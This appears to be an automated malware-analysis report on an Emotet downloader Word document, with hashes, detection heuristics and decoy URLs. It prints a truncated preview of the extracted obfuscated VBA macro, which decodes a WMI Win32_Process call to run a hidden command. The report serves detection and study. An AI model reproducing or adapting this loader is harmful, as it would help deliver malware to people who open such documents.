Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 d07f5faa13f8bdbb…

MALICIOUS

Office (OLE)

95.5 KB Created: 2019-10-03 13:38:00 Authoring application: Microsoft Office Word First seen: 2019-11-20
MD5: 39283b8d17e7b266ccb3a5a01b70e163 SHA-1: 2f8b5f20881426720ed4b6f5f0dd386f572ccd90 SHA-256: d07f5faa13f8bdbbf12b03c1a1be3dfa5731dada0d1ac005b31d78fa2db6db77
282 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1140 Deobfuscate or Reverse Engineer

The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-10019714-0. High-severity heuristics indicate the presence of an obfuscated auto-executing VBA loader that uses CreateObject and Shell execution. The VBA macro code, while partially truncated and obfuscated, contains references to URLs that are likely used to download additional malicious content. The primary function appears to be the execution of a second-stage payload.

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-10019714-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-10019714-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www.microsoft.com/Cottoniwl In document text (OLE body)
    • https://www.microsoft.com/Metricspjm0In document text (OLE body)
    • https://www.microsoft.com/solutionsjjz�In document text (OLE body)
    • https://www.microsoft.com/Refined_Soft_GlovesuacIn document text (OLE body)
    • https://www.microsoft.com/Investment_AccountslmIn document text (OLE body)
    • https://www.microsoft.com/connectingkurIn document text (OLE body)
    • https://www.microsoft.com/IndustrialivuIn document text (OLE body)
    • https://www.microsoft.com/overridingrrdIn document text (OLE body)
    • https://www.microsoft.com/highlevelzwbIn document text (OLE body)
    • https://www.microsoft.com/TurkeyfzlIn document text (OLE body)
    • https://www.microsoft.com/functionalitieswts�In document text (OLE body)
    • https://www.microsoft.com/Dynamicbzz�In document text (OLE body)
    • https://www.microsoft.com/USBdinIn document text (OLE body)
    • https://www.microsoft.com/bypassvtbIn document text (OLE body)
    • https://www.microsoft.com/limerfzIn document text (OLE body)
    • https://www.microsoft.com/navigatingbwiIn document text (OLE body)
    • https://www.microsoft.com/parsingwwjIn document text (OLE body)
    • https://www.microsoft.com/wirelessjiuIn document text (OLE body)
    • https://www.microsoft.com/rebootpooIn document text (OLE body)
    • https://www.microsoft.com/conglomerationufjIn document text (OLE body)
    • https://www.microsoft.com/SurinamewziIn document text (OLE body)
    • https://www.microsoft.com/onlineqsoIn document text (OLE body)
    • https://www.microsoft.com/Tastylua�In document text (OLE body)
    • https://www.microsoft.com/Plannerujh��In document text (OLE body)
    • https://www.microsoft.com/lavenderspjIn document text (OLE body)
    • https://www.microsoft.com/backendlzftfiIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
    • https://www.microsoft.com/MetricspjmIn document text (OLE body)
    • https://www.microsoft.com/solutionsjjzIn document text (OLE body)
    • https://www.microsoft.com/functionalitieswtsIn document text (OLE body)
    • https://www.microsoft.com/DynamicbzzIn document text (OLE body)
    • https://www.microsoft.com/TastyluaIn document text (OLE body)
    • https://www.microsoft.com/PlannerujhIn document text (OLE body)
    • https://www.microsoft.com/backendlzfIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13886 bytes
SHA-256: b93dbbfa49075d2644fb361f704dfe551feff5e07660a823357dd502353688aa
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Buckinghamshirezio"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Chiefror, 0, 0, MSForms, TextBox"
Attribute VB_Control = "Operationsriv, 1, 1, MSForms, TextBox"
Attribute VB_Control = "Datanpv, 2, 2, MSForms, TextBox"
Attribute VB_Control = "unleashiqq, 3, 3, MSForms, TextBox"
Attribute VB_Control = "indexics, 4, 4, MSForms, TextBox"
Attribute VB_Control = "Saudi_Riyalwjt, 5, 5, MSForms, TextBox"

Attribute VB_Name = "Ergonomicawc"
Function eenablejkn()
On Error Resume Next
   'https://www.microsoft.com/Cottoniwl
inputrpi = "Licensed Cotton Bacon North Carolina Point interactive Toys & Computers District Road bypass time-frame even-keeled Focused Usability backing up repurpose"
'Equatorial Guinea Intelligent capacitor Agent Danish Krone lavender RAM program Specialist
'https://www.microsoft.com/Metricspjm
While inputrpi = wdXMLValidationStatusOK
'open-source Kids, Movies & Beauty Awesome Reactive Buckinghamshire benchmark solution capacity Serbian Dinar Qatar copying Handmade
Berkshirevwu = CDate(192)
Cambridgeshireban = Technicianbrv
Generic_Frozen_Chickenkwi = CDbl(963)
Technicianqlb = 591
motivatingwlq = 621
USBiir = Atn(Moroccocbv)
'hub Rubber US Dollar Cuba Metal Credit Card Account Baby, Tools & Shoes
Wend
'teal e-business generating grid-enabled Gorgeous Money Market Account Chad Luxembourg 24/7 Investment Account
tertiaryjvk = Cambridgeshirekoq + "p" + dynamicsmh(Buckinghamshirezio.indexics + Buckinghamshirezio.Datanpv) 'Zimbabwe Dollar Finland Small Savings Account deposit Music Technician Handcrafted Fresh Shoes IB Rubber circuit Intranet
   'https://www.microsoft.com/solutionsjjz
inputrpi = "Burkina Faso Metal Burgs Senior magenta Soft mobile Licensed Frozen Ball Savings Account Montana next-generation Buckinghamshire alarm Isle"
'redundant Practical Wooden Car Lao People's Democratic Republic Wall Upgradable Loop Arkansas invoice navigate Kip regional
'https://www.microsoft.com/Refined_Soft_Glovesuac
While inputrpi = wdXMLValidationStatusOK
'Small Soft Gloves olive definition Buckinghamshire International Money Market Account parsing heuristic Philippine Peso Investor Refined Concrete Shirt Licensed AGP US Dollar
Bedfordshirewjw = CDate(559)
Rusticroh = Sleek_Granite_Chickenstj
Cape_Verdecui = CDbl(854)
Gorgeouswkk = 692
plumlkb = 689
hapticjub = Atn(wq1080pkaq)
'Cotton partnerships cohesive transitional CFP Franc Points Texas
Wend
'Greens Licensed Gorgeous calculate ADP Factors Licensed Rubber Shoes communities
targetwwz = programrii
Set Digitizedvfc = CreateObject(dynamicsmh(dynamicsmh(CStr(547504 + 66 - 547504) + "666666winmgmts:666666Win32_Proc6666ess")))
targetwwz = targetwwz + Digitizedvfc.Create#(tertiaryjvk, Datazsl, Engineeriwd, Interactionsviw)
   'https://www.microsoft.com/Investment_Accountslm
inputrpi = "Rubber Fork Producer protocol Licensed Frozen Chips Practical Plastic Table Assistant bandwidth"
'Practical Rubber Shoes Uzbekistan Incredible Wooden Shoes sticky Denmark Afghanistan Devolved viral Small Steel Chair Silver internet solution Credit Card Account synthesizing
'https://www.microsoft.com/connectingkur
While inputrpi = wdXMLValidationStatusOK
'copy Handcrafted Steel Computer driver Key SMS Rue Valley Product Licensed Granite Pants Rustic Cotton Towels calculate payment
dynamicbkr = CDate(433)
Berkshireikb = Ergonomic_Steel_Mousewiz
generatevsq = CDbl(139)
Delawaretcs = 142
connectingaib = 935
Underpasstdc = Atn(Bedfordshirelfv)
'Pataca Home Loan Account Extensions Licensed Frozen Keyboard Harbor calculate Plastic
Wend
'Wisconsin Islands Money Market Account Center fault-tolerant superstructure hierarchy leading-edge collaborative
End Function

Attribute VB_Name = "New_Israeli_Sheqelsjp"
Function Engineeriwd()
On Error Resume Next
   'https://www.microsoft.com
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.